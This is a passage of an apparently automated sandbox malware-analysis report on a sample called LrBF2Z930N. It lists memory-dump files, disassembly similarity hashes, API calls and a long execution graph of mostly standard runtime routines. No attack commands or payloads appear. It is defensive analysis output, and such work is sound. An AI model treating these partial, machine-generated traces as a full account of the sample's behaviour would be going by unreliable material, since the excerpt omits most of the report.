                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-1246513382
                                                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                      • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                      • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                                                      • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                      • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                                                      • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                      • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:1.3%
                                                                                      Total number of Nodes:1671
                                                                                      Total number of Limit Nodes:5
                                                                                      execution_graph 6672 3786a1c6 IsProcessorFeaturePresent 6673 37867bc7 6674 37867bd3 ___DestructExceptionObject 6673->6674 6675 37867c0a _abort 6674->6675 6681 37865671 RtlEnterCriticalSection 6674->6681 6677 37867be7 6678 37867f86 __fassign 20 API calls 6677->6678 6679 37867bf7 6678->6679 6682 37867c10 6679->6682 6681->6677 6685 378656b9 RtlLeaveCriticalSection 6682->6685 6684 37867c17 6684->6675 6685->6684 7281 3786a945 7283 3786a96d 7281->7283 7282 3786a9a5 7283->7282 7284 3786a997 7283->7284 7285 3786a99e 7283->7285 7290 3786aa17 7284->7290 7294 3786aa00 7285->7294 7291 3786aa20 7290->7291 7298 3786b19b 7291->7298 7295 3786aa20 7294->7295 7296 3786b19b __startOneArgErrorHandling 21 API calls 7295->7296 7297 3786a9a3 7296->7297 7300 3786b1da __startOneArgErrorHandling 7298->7300 7304 3786b25c __startOneArgErrorHandling 7300->7304 7308 3786b59e 7300->7308 7301 3786b286 7303 3786b292 7301->7303 7315 3786b8b2 7301->7315 7305 37862ada _ValidateLocalCookies 5 API calls 7303->7305 7304->7301 7311 378678a3 7304->7311 7307 3786a99c 7305->7307 7322 3786b5c1 7308->7322 7312 378678cb 7311->7312 7313 37862ada _ValidateLocalCookies 5 API calls 7312->7313 7314 378678e8 7313->7314 7314->7301 7316 3786b8d4 7315->7316 7317 3786b8bf 7315->7317 7319 37866368 __dosmaperr 20 API calls 7316->7319 7318 3786b8d9 7317->7318 7320 37866368 __dosmaperr 20 API calls 7317->7320 7318->7303 7319->7318 7321 3786b8cc 7320->7321 7321->7303 7323 3786b5ec __raise_exc 7322->7323 7324 3786b7e5 RaiseException 7323->7324 7325 3786b5bc 7324->7325 7325->7304 7087 37865303 7090 378650a5 7087->7090 7099 3786502f 7090->7099 7093 3786502f 5 API calls 7094 378650c3 7093->7094 7095 37865000 20 API calls 7094->7095 7096 378650ce 7095->7096 7097 37865000 20 API calls 7096->7097 7098 378650d9 7097->7098 7100 37865048 7099->7100 7101 37862ada _ValidateLocalCookies 5 API calls 7100->7101 7102 37865069 7101->7102 7102->7093 7103 37867103 GetCommandLineA GetCommandLineW 7326 3786af43 7327 3786af4d 7326->7327 7328 3786af59 7326->7328 7327->7328 7329 3786af52 CloseHandle 7327->7329 7329->7328 6042 37867a80 6043 37867a8d 6042->6043 6044 3786637b _abort 20 API calls 6043->6044 6045 37867aa7 6044->6045 6046 3786571e _free 20 API calls 6045->6046 6047 37867ab3 6046->6047 6048 3786637b _abort 20 API calls 6047->6048 6052 37867ad9 6047->6052 6049 37867acd 6048->6049 6051 3786571e _free 20 API calls 6049->6051 6051->6052 6053 37867ae5 6052->6053 6054 37865eb7 6052->6054 6055 37865c45 _abort 5 API calls 6054->6055 6056 37865ede 6055->6056 6057 37865efc InitializeCriticalSectionAndSpinCount 6056->6057 6058 37865ee7 6056->6058 6057->6058 6059 37862ada _ValidateLocalCookies 5 API calls 6058->6059 6060 37865f13 6059->6060 6060->6052 7330 37868640 7333 37868657 7330->7333 7334 37868665 7333->7334 7335 37868679 7333->7335 7336 37866368 __dosmaperr 20 API calls 7334->7336 7337 37868693 7335->7337 7338 37868681 7335->7338 7339 3786866a 7336->7339 7341 378654a7 __fassign 38 API calls 7337->7341 7344 37868652 7337->7344 7340 37866368 __dosmaperr 20 API calls 7338->7340 7342 378662ac _abort 26 API calls 7339->7342 7343 37868686 7340->7343 7341->7344 7342->7344 7345 378662ac _abort 26 API calls 7343->7345 7345->7344 7346 3786724e GetProcessHeap 7347 3786284f 7348 37862882 std::exception::exception 27 API calls 7347->7348 7349 3786285d 7348->7349 7104 3786220c 7105 37862215 7104->7105 7106 3786221a dllmain_dispatch 7104->7106 7108 378622b1 7105->7108 7109 378622c7 7108->7109 7111 378622d0 7109->7111 7112 37862264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7109->7112 7111->7106 7112->7111 6061 3786508a 6062 378650a2 6061->6062 6063 3786509c 6061->6063 6065 37865000 6063->6065 6066 3786502a 6065->6066 6067 3786500d 6065->6067 6066->6062 6068 37865024 6067->6068 6069 3786571e _free 20 API calls 6067->6069 6070 3786571e _free 20 API calls 6068->6070 6069->6067 6070->6066 7350 37865348 7351 37863529 ___vcrt_uninitialize 8 API calls 7350->7351 7352 3786534f 7351->7352 7353 37867b48 7363 37868ebf 7353->7363 7357 37867b55 7376 3786907c 7357->7376 7360 37867b7f 7361 3786571e _free 20 API calls 7360->7361 7362 37867b8a 7361->7362 7380 37868ec8 7363->7380 7365 37867b50 7366 37868fdc 7365->7366 7367 37868fe8 ___DestructExceptionObject 7366->7367 7400 37865671 RtlEnterCriticalSection 7367->7400 7369 3786905e 7414 37869073 7369->7414 7371 37868ff3 7371->7369 7372 37869032 RtlDeleteCriticalSection 7371->7372 7401 3786a09c 7371->7401 7375 3786571e _free 20 API calls 7372->7375 7373 3786906a _abort 7373->7357 7375->7371 7377 37869092 7376->7377 7379 37867b64 RtlDeleteCriticalSection 7376->7379 7378 3786571e _free 20 API calls 7377->7378 7377->7379 7378->7379 7379->7357 7379->7360 7381 37868ed4 ___DestructExceptionObject 7380->7381 7390 37865671 RtlEnterCriticalSection 7381->7390 7383 37868f77 7395 37868f97 7383->7395 7384 37868ee3 7384->7383 7389 37868e78 66 API calls 7384->7389 7391 37867b94 RtlEnterCriticalSection 7384->7391 7392 37868f6d 7384->7392 7388 37868f83 _abort 7388->7365 7389->7384 7390->7384 7391->7384 7398 37867ba8 RtlLeaveCriticalSection 7392->7398 7394 37868f75 7394->7384 7399 378656b9 RtlLeaveCriticalSection 7395->7399 7397 37868f9e 7397->7388 7398->7394 7399->7397 7400->7371 7402 3786a0a8 ___DestructExceptionObject 7401->7402 7403 3786a0ce 7402->7403 7404 3786a0b9 7402->7404 7413 3786a0c9 _abort 7403->7413 7417 37867b94 RtlEnterCriticalSection 7403->7417 7405 37866368 __dosmaperr 20 API calls 7404->7405 7407 3786a0be 7405->7407 7409 378662ac _abort 26 API calls 7407->7409 7408 3786a0ea 7418 3786a026 7408->7418 7409->7413 7411 3786a0f5 7434 3786a112 7411->7434 7413->7371 7682 378656b9 RtlLeaveCriticalSection 7414->7682 7416 3786907a 7416->7373 7417->7408 7419 3786a033 7418->7419 7420 3786a048 7418->7420 7421 37866368 __dosmaperr 20 API calls 7419->7421 7426 3786a043 7420->7426 7437 37868e12 7420->7437 7422 3786a038 7421->7422 7424 378662ac _abort 26 API calls 7422->7424 7424->7426 7426->7411 7427 3786907c 20 API calls 7428 3786a064 7427->7428 7443 37867a5a 7428->7443 7430 3786a06a 7450 3786adce 7430->7450 7433 3786571e _free 20 API calls 7433->7426 7681 37867ba8 RtlLeaveCriticalSection 7434->7681 7436 3786a11a 7436->7413 7438 37868e26 7437->7438 7439 37868e2a 7437->7439 7438->7427 7439->7438 7440 37867a5a 26 API calls 7439->7440 7441 37868e4a 7440->7441 7465 37869a22 7441->7465 7444 37867a66 7443->7444 7445 37867a7b 7443->7445 7446 37866368 __dosmaperr 20 API calls 7444->7446 7445->7430 7447 37867a6b 7446->7447 7448 378662ac _abort 26 API calls 7447->7448 7449 37867a76 7448->7449 7449->7430 7451 3786adf2 7450->7451 7452 3786addd 7450->7452 7453 3786ae2d 7451->7453 7457 3786ae19 7451->7457 7454 37866355 __dosmaperr 20 API calls 7452->7454 7455 37866355 __dosmaperr 20 API calls 7453->7455 7456 3786ade2 7454->7456 7458 3786ae32 7455->7458 7459 37866368 __dosmaperr 20 API calls 7456->7459 7638 3786ada6 7457->7638 7461 37866368 __dosmaperr 20 API calls 7458->7461 7462 3786a070 7459->7462 7463 3786ae3a 7461->7463 7462->7426 7462->7433 7464 378662ac _abort 26 API calls 7463->7464 7464->7462 7466 37869a2e ___DestructExceptionObject 7465->7466 7467 37869a36 7466->7467 7468 37869a4e 7466->7468 7490 37866355 7467->7490 7470 37869aec 7468->7470 7474 37869a83 7468->7474 7472 37866355 __dosmaperr 20 API calls 7470->7472 7475 37869af1 7472->7475 7473 37866368 __dosmaperr 20 API calls 7476 37869a43 _abort 7473->7476 7493 37868c7b RtlEnterCriticalSection 7474->7493 7478 37866368 __dosmaperr 20 API calls 7475->7478 7476->7438 7480 37869af9 7478->7480 7479 37869a89 7481 37869aa5 7479->7481 7482 37869aba 7479->7482 7483 378662ac _abort 26 API calls 7480->7483 7484 37866368 __dosmaperr 20 API calls 7481->7484 7494 37869b0d 7482->7494 7483->7476 7486 37869aaa 7484->7486 7488 37866355 __dosmaperr 20 API calls 7486->7488 7487 37869ab5 7545 37869ae4 7487->7545 7488->7487 7491 37865b7a _abort 20 API calls 7490->7491 7492 3786635a 7491->7492 7492->7473 7493->7479 7495 37869b3b 7494->7495 7533 37869b34 7494->7533 7496 37869b5e 7495->7496 7497 37869b3f 7495->7497 7501 37869baf 7496->7501 7502 37869b92 7496->7502 7498 37866355 __dosmaperr 20 API calls 7497->7498 7500 37869b44 7498->7500 7499 37862ada _ValidateLocalCookies 5 API calls 7503 37869d15 7499->7503 7504 37866368 __dosmaperr 20 API calls 7500->7504 7505 37869bc5 7501->7505 7548 3786a00b 7501->7548 7506 37866355 __dosmaperr 20 API calls 7502->7506 7503->7487 7507 37869b4b 7504->7507 7551 378696b2 7505->7551 7510 37869b97 7506->7510 7511 378662ac _abort 26 API calls 7507->7511 7513 37866368 __dosmaperr 20 API calls 7510->7513 7511->7533 7516 37869b9f 7513->7516 7514 37869bd3 7519 37869bd7 7514->7519 7520 37869bf9 7514->7520 7515 37869c0c 7517 37869c66 WriteFile 7515->7517 7518 37869c20 7515->7518 7521 378662ac _abort 26 API calls 7516->7521 7525 37869c89 GetLastError 7517->7525 7527 37869bef 7517->7527 7522 37869c56 7518->7522 7523 37869c28 7518->7523 7524 37869ccd 7519->7524 7558 37869645 7519->7558 7563 37869492 GetConsoleCP 7520->7563 7521->7533 7589 37869728 7522->7589 7528 37869c46 7523->7528 7529 37869c2d 7523->7529 7532 37866368 __dosmaperr 20 API calls 7524->7532 7524->7533 7525->7527 7527->7524 7527->7533 7536 37869ca9 7527->7536 7581 378698f5 7528->7581 7529->7524 7574 37869807 7529->7574 7535 37869cf2 7532->7535 7533->7499 7538 37866355 __dosmaperr 20 API calls 7535->7538 7539 37869cc4 7536->7539 7540 37869cb0 7536->7540 7538->7533 7596 37866332 7539->7596 7541 37866368 __dosmaperr 20 API calls 7540->7541 7543 37869cb5 7541->7543 7544 37866355 __dosmaperr 20 API calls 7543->7544 7544->7533 7637 37868c9e RtlLeaveCriticalSection 7545->7637 7547 37869aea 7547->7476 7601 37869f8d 7548->7601 7623 37868dbc 7551->7623 7553 378696c2 7554 378696c7 7553->7554 7555 37865af6 _abort 38 API calls 7553->7555 7554->7514 7554->7515 7556 378696ea 7555->7556 7556->7554 7557 37869708 GetConsoleMode 7556->7557 7557->7554 7561 3786969f 7558->7561 7562 3786966a 7558->7562 7559 3786a181 WriteConsoleW CreateFileW 7559->7562 7560 378696a1 GetLastError 7560->7561 7561->7527 7562->7559 7562->7560 7562->7561 7568 37869607 7563->7568 7572 378694f5 7563->7572 7564 37862ada _ValidateLocalCookies 5 API calls 7566 37869641 7564->7566 7566->7527 7567 378679e6 40 API calls __fassign 7567->7572 7568->7564 7569 3786957b WideCharToMultiByte 7569->7568 7570 378695a1 WriteFile 7569->7570 7571 3786962a GetLastError 7570->7571 7570->7572 7571->7568 7572->7567 7572->7568 7572->7569 7573 378695d2 WriteFile 7572->7573 7632 37867c19 7572->7632 7573->7571 7573->7572 7579 37869816 7574->7579 7575 378698d8 7576 37862ada _ValidateLocalCookies 5 API calls 7575->7576 7578 378698f1 7576->7578 7577 37869894 WriteFile 7577->7579 7580 378698da GetLastError 7577->7580 7578->7527 7579->7575 7579->7577 7580->7575 7588 37869904 7581->7588 7582 37869a0f 7583 37862ada _ValidateLocalCookies 5 API calls 7582->7583 7584 37869a1e 7583->7584 7584->7527 7585 37869986 WideCharToMultiByte 7586 37869a07 GetLastError 7585->7586 7587 378699bb WriteFile 7585->7587 7586->7582 7587->7586 7587->7588 7588->7582 7588->7585 7588->7587 7594 37869737 7589->7594 7590 378697ea 7591 37862ada _ValidateLocalCookies 5 API calls 7590->7591 7595 37869803 7591->7595 7592 378697a9 WriteFile 7593 378697ec GetLastError 7592->7593 7592->7594 7593->7590 7594->7590 7594->7592 7595->7527 7597 37866355 __dosmaperr 20 API calls 7596->7597 7598 3786633d __dosmaperr 7597->7598 7599 37866368 __dosmaperr 20 API calls 7598->7599 7600 37866350 7599->7600 7600->7533 7610 37868d52 7601->7610 7603 37869f9f 7604 37869fa7 7603->7604 7605 37869fb8 SetFilePointerEx 7603->7605 7606 37866368 __dosmaperr 20 API calls 7604->7606 7607 37869fd0 GetLastError 7605->7607 7608 37869fac 7605->7608 7606->7608 7609 37866332 __dosmaperr 20 API calls 7607->7609 7608->7505 7609->7608 7611 37868d74 7610->7611 7612 37868d5f 7610->7612 7615 37866355 __dosmaperr 20 API calls 7611->7615 7617 37868d99 7611->7617 7613 37866355 __dosmaperr 20 API calls 7612->7613 7614 37868d64 7613->7614 7616 37866368 __dosmaperr 20 API calls 7614->7616 7618 37868da4 7615->7618 7620 37868d6c 7616->7620 7617->7603 7619 37866368 __dosmaperr 20 API calls 7618->7619 7621 37868dac 7619->7621 7620->7603 7622 378662ac _abort 26 API calls 7621->7622 7622->7620 7624 37868dc9 7623->7624 7626 37868dd6 7623->7626 7625 37866368 __dosmaperr 20 API calls 7624->7625 7627 37868dce 7625->7627 7628 37868de2 7626->7628 7629 37866368 __dosmaperr 20 API calls 7626->7629 7627->7553 7628->7553 7630 37868e03 7629->7630 7631 378662ac _abort 26 API calls 7630->7631 7631->7627 7633 37865af6 _abort 38 API calls 7632->7633 7634 37867c24 7633->7634 7635 37867a00 __fassign 38 API calls 7634->7635 7636 37867c34 7635->7636 7636->7572 7637->7547 7641 3786ad24 7638->7641 7640 3786adca 7640->7462 7642 3786ad30 ___DestructExceptionObject 7641->7642 7652 37868c7b RtlEnterCriticalSection 7642->7652 7644 3786ad3e 7645 3786ad65 7644->7645 7646 3786ad70 7644->7646 7653 3786ae4d 7645->7653 7648 37866368 __dosmaperr 20 API calls 7646->7648 7649 3786ad6b 7648->7649 7668 3786ad9a 7649->7668 7651 3786ad8d _abort 7651->7640 7652->7644 7654 37868d52 26 API calls 7653->7654 7656 3786ae5d 7654->7656 7655 3786ae63 7671 37868cc1 7655->7671 7656->7655 7658 37868d52 26 API calls 7656->7658 7666 3786ae95 7656->7666 7661 3786ae8c 7658->7661 7659 37868d52 26 API calls 7662 3786aea1 CloseHandle 7659->7662 7663 37868d52 26 API calls 7661->7663 7662->7655 7664 3786aead GetLastError 7662->7664 7663->7666 7664->7655 7665 37866332 __dosmaperr 20 API calls 7667 3786aedd 7665->7667 7666->7655 7666->7659 7667->7649 7680 37868c9e RtlLeaveCriticalSection 7668->7680 7670 3786ada4 7670->7651 7672 37868d37 7671->7672 7673 37868cd0 7671->7673 7674 37866368 __dosmaperr 20 API calls 7672->7674 7673->7672 7679 37868cfa 7673->7679 7675 37868d3c 7674->7675 7676 37866355 __dosmaperr 20 API calls 7675->7676 7677 37868d27 7676->7677 7677->7665 7677->7667 7678 37868d21 SetStdHandle 7678->7677 7679->7677 7679->7678 7680->7670 7681->7436 7682->7416 6071 37868a89 6074 37866d60 6071->6074 6075 37866d72 6074->6075 6076 37866d69 6074->6076 6078 37866c5f 6076->6078 6098 37865af6 GetLastError 6078->6098 6080 37866c6c 6118 37866d7e 6080->6118 6082 37866c74 6127 378669f3 6082->6127 6085 37866c8b 6085->6075 6090 3786571e _free 20 API calls 6090->6085 6091 37866ce6 6095 37866d12 6091->6095 6096 3786571e _free 20 API calls 6091->6096 6092 37866cc9 6093 37866368 __dosmaperr 20 API calls 6092->6093 6094 37866cce 6093->6094 6094->6090 6095->6094 6151 378668c9 6095->6151 6096->6095 6099 37865b0c 6098->6099 6100 37865b12 6098->6100 6101 37865e08 _abort 11 API calls 6099->6101 6102 3786637b _abort 20 API calls 6100->6102 6104 37865b61 SetLastError 6100->6104 6101->6100 6103 37865b24 6102->6103 6105 37865b2c 6103->6105 6106 37865e5e _abort 11 API calls 6103->6106 6104->6080 6108 3786571e _free 20 API calls 6105->6108 6107 37865b41 6106->6107 6107->6105 6110 37865b48 6107->6110 6109 37865b32 6108->6109 6111 37865b6d SetLastError 6109->6111 6112 3786593c _abort 20 API calls 6110->6112 6154 378655a8 6111->6154 6113 37865b53 6112->6113 6115 3786571e _free 20 API calls 6113->6115 6117 37865b5a 6115->6117 6117->6104 6117->6111 6119 37866d8a ___DestructExceptionObject 6118->6119 6120 37865af6 _abort 38 API calls 6119->6120 6125 37866d94 6120->6125 6122 37866e18 _abort 6122->6082 6124 378655a8 _abort 38 API calls 6124->6125 6125->6122 6125->6124 6126 3786571e _free 20 API calls 6125->6126 6327 37865671 RtlEnterCriticalSection 6125->6327 6328 37866e0f 6125->6328 6126->6125 6332 378654a7 6127->6332 6130 37866a26 6132 37866a3d 6130->6132 6133 37866a2b GetACP 6130->6133 6131 37866a14 GetOEMCP 6131->6132 6132->6085 6134 378656d0 6132->6134 6133->6132 6135 3786570e 6134->6135 6136 378656de _abort 6134->6136 6137 37866368 __dosmaperr 20 API calls 6135->6137 6136->6135 6138 378656f9 RtlAllocateHeap 6136->6138 6140 3786474f _abort 7 API calls 6136->6140 6139 3786570c 6137->6139 6138->6136 6138->6139 6139->6094 6141 37866e20 6139->6141 6140->6136 6142 378669f3 40 API calls 6141->6142 6143 37866e3f 6142->6143 6146 37866e90 IsValidCodePage 6143->6146 6148 37866e46 6143->6148 6150 37866eb5 ___scrt_fastfail 6143->6150 6144 37862ada _ValidateLocalCookies 5 API calls 6145 37866cc1 6144->6145 6145->6091 6145->6092 6147 37866ea2 GetCPInfo 6146->6147 6146->6148 6147->6148 6147->6150 6148->6144 6479 37866acb GetCPInfo 6150->6479 6552 37866886 6151->6552 6153 378668ed 6153->6094 6165 37867613 6154->6165 6157 378655b8 6159 378655c2 IsProcessorFeaturePresent 6157->6159 6164 378655e0 6157->6164 6160 378655cd 6159->6160 6195 378660e2 6160->6195 6201 37864bc1 6164->6201 6204 37867581 6165->6204 6168 3786766e 6169 3786767a _abort 6168->6169 6170 37865b7a _abort 20 API calls 6169->6170 6171 378676a1 _abort 6169->6171 6175 378676a7 _abort 6169->6175 6170->6171 6172 378676f3 6171->6172 6171->6175 6178 378676d6 6171->6178 6173 37866368 __dosmaperr 20 API calls 6172->6173 6174 378676f8 6173->6174 6218 378662ac 6174->6218 6181 3786771f 6175->6181 6221 37865671 RtlEnterCriticalSection 6175->6221 6230 3786bdc9 6178->6230 6186 3786777e 6181->6186 6187 37867776 6181->6187 6192 378677a9 6181->6192 6222 378656b9 RtlLeaveCriticalSection 6181->6222 6184 37864bc1 _abort 28 API calls 6184->6186 6186->6192 6223 37867665 6186->6223 6187->6184 6189 37865af6 _abort 38 API calls 6193 3786780c 6189->6193 6191 37867665 _abort 38 API calls 6191->6192 6226 3786782e 6192->6226 6193->6178 6194 37865af6 _abort 38 API calls 6193->6194 6194->6178 6196 378660fe ___scrt_fastfail 6195->6196 6197 3786612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6196->6197 6198 378661fb ___scrt_fastfail 6197->6198 6199 37862ada _ValidateLocalCookies 5 API calls 6198->6199 6200 37866219 6199->6200 6200->6164 6249 3786499b 6201->6249 6207 37867527 6204->6207 6206 378655ad 6206->6157 6206->6168 6208 37867533 ___DestructExceptionObject 6207->6208 6213 37865671 RtlEnterCriticalSection 6208->6213 6210 37867541 6214 37867575 6210->6214 6212 37867568 _abort 6212->6206 6213->6210 6217 378656b9 RtlLeaveCriticalSection 6214->6217 6216 3786757f 6216->6212 6217->6216 6233 37866231 6218->6233 6220 378662b8 6220->6178 6221->6181 6222->6187 6224 37865af6 _abort 38 API calls 6223->6224 6225 3786766a 6224->6225 6225->6191 6227 37867834 6226->6227 6228 378677fd 6226->6228 6248 378656b9 RtlLeaveCriticalSection 6227->6248 6228->6178 6228->6189 6228->6193 6231 37862ada _ValidateLocalCookies 5 API calls 6230->6231 6232 3786bdd4 6231->6232 6232->6232 6234 37865b7a _abort 20 API calls 6233->6234 6235 37866247 6234->6235 6236 378662a6 6235->6236 6240 37866255 6235->6240 6244 378662bc IsProcessorFeaturePresent 6236->6244 6238 378662ab 6239 37866231 _abort 26 API calls 6238->6239 6241 378662b8 6239->6241 6242 37862ada _ValidateLocalCookies 5 API calls 6240->6242 6241->6220 6243 3786627c 6242->6243 6243->6220 6245 378662c7 6244->6245 6246 378660e2 _abort 8 API calls 6245->6246 6247 378662dc GetCurrentProcess TerminateProcess 6246->6247 6247->6238 6248->6228 6250 378649a7 _abort 6249->6250 6258 378649bf 6250->6258 6271 37864af5 GetModuleHandleW 6250->6271 6257 37864a3c 6261 37864a54 6257->6261 6284 37864669 6257->6284 6280 37865671 RtlEnterCriticalSection 6258->6280 6259 37864a82 6291 37864ab4 6259->6291 6260 37864aae 6265 3786bdc9 _abort 5 API calls 6260->6265 6267 37864669 _abort 5 API calls 6261->6267 6262 378649c7 6262->6257 6268 37864a65 6262->6268 6281 3786527a 6262->6281 6270 37864ab3 6265->6270 6267->6268 6288 37864aa5 6268->6288 6272 378649b3 6271->6272 6272->6258 6273 37864b39 GetModuleHandleExW 6272->6273 6274 37864b63 GetProcAddress 6273->6274 6275 37864b78 6273->6275 6274->6275 6276 37864b95 6275->6276 6277 37864b8c FreeLibrary 6275->6277 6278 37862ada _ValidateLocalCookies 5 API calls 6276->6278 6277->6276 6279 37864b9f 6278->6279 6279->6258 6280->6262 6299 37865132 6281->6299 6285 37864698 6284->6285 6286 37862ada _ValidateLocalCookies 5 API calls 6285->6286 6287 378646c1 6286->6287 6287->6261 6320 378656b9 RtlLeaveCriticalSection 6288->6320 6290 37864a7e 6290->6259 6290->6260 6321 37866025 6291->6321 6294 37864ae2 6296 37864b39 _abort 8 API calls 6294->6296 6295 37864ac2 GetPEB 6295->6294 6297 37864ad2 GetCurrentProcess TerminateProcess 6295->6297 6298 37864aea ExitProcess 6296->6298 6297->6294 6302 378650e1 6299->6302 6301 37865156 6301->6257 6303 378650ed ___DestructExceptionObject 6302->6303 6310 37865671 RtlEnterCriticalSection 6303->6310 6305 378650fb 6311 3786515a 6305->6311 6309 37865119 _abort 6309->6301 6310->6305 6314 37865182 6311->6314 6315 3786517a 6311->6315 6312 37862ada _ValidateLocalCookies 5 API calls 6313 37865108 6312->6313 6317 37865126 6313->6317 6314->6315 6316 3786571e _free 20 API calls 6314->6316 6315->6312 6316->6315 6318 378656b9 _abort RtlLeaveCriticalSection 6317->6318 6319 37865130 6318->6319 6319->6309 6320->6290 6322 37866040 6321->6322 6323 3786604a 6321->6323 6325 37862ada _ValidateLocalCookies 5 API calls 6322->6325 6324 37865c45 _abort 5 API calls 6323->6324 6324->6322 6326 37864abe 6325->6326 6326->6294 6326->6295 6327->6125 6331 378656b9 RtlLeaveCriticalSection 6328->6331 6330 37866e16 6330->6125 6331->6330 6333 378654c4 6332->6333 6339 378654ba 6332->6339 6334 37865af6 _abort 38 API calls 6333->6334 6333->6339 6335 378654e5 6334->6335 6340 37867a00 6335->6340 6339->6130 6339->6131 6341 37867a13 6340->6341 6342 378654fe 6340->6342 6341->6342 6348 37867f0f 6341->6348 6344 37867a2d 6342->6344 6345 37867a55 6344->6345 6346 37867a40 6344->6346 6345->6339 6346->6345 6347 37866d7e __fassign 38 API calls 6346->6347 6347->6345 6349 37867f1b ___DestructExceptionObject 6348->6349 6350 37865af6 _abort 38 API calls 6349->6350 6351 37867f24 6350->6351 6353 37867f72 _abort 6351->6353 6360 37865671 RtlEnterCriticalSection 6351->6360 6353->6342 6354 37867f42 6361 37867f86 6354->6361 6359 378655a8 _abort 38 API calls 6359->6353 6360->6354 6362 37867f94 __fassign 6361->6362 6364 37867f56 6361->6364 6362->6364 6368 37867cc2 6362->6368 6365 37867f75 6364->6365 6478 378656b9 RtlLeaveCriticalSection 6365->6478 6367 37867f69 6367->6353 6367->6359 6370 37867d42 6368->6370 6373 37867cd8 6368->6373 6371 3786571e _free 20 API calls 6370->6371 6395 37867d90 6370->6395 6372 37867d64 6371->6372 6376 3786571e _free 20 API calls 6372->6376 6373->6370 6374 37867d0b 6373->6374 6378 3786571e _free 20 API calls 6373->6378 6375 37867d2d 6374->6375 6380 3786571e _free 20 API calls 6374->6380 6377 3786571e _free 20 API calls 6375->6377 6379 37867d77 6376->6379 6382 37867d37 6377->6382 6384 37867d00 6378->6384 6381 3786571e _free 20 API calls 6379->6381 6385 37867d22 6380->6385 6386 37867d85 6381->6386 6387 3786571e _free 20 API calls 6382->6387 6383 37867dfe 6388 3786571e _free 20 API calls 6383->6388 6396 378690ba 6384->6396 6424 378691b8 6385->6424 6391 3786571e _free 20 API calls 6386->6391 6387->6370 6393 37867e04 6388->6393 6391->6395 6392 3786571e 20 API calls _free 6394 37867d9e 6392->6394 6393->6364 6394->6383 6394->6392 6436 37867e35 6395->6436 6397 378690cb 6396->6397 6423 378691b4 6396->6423 6398 378690dc 6397->6398 6399 3786571e _free 20 API calls 6397->6399 6400 378690ee 6398->6400 6401 3786571e _free 20 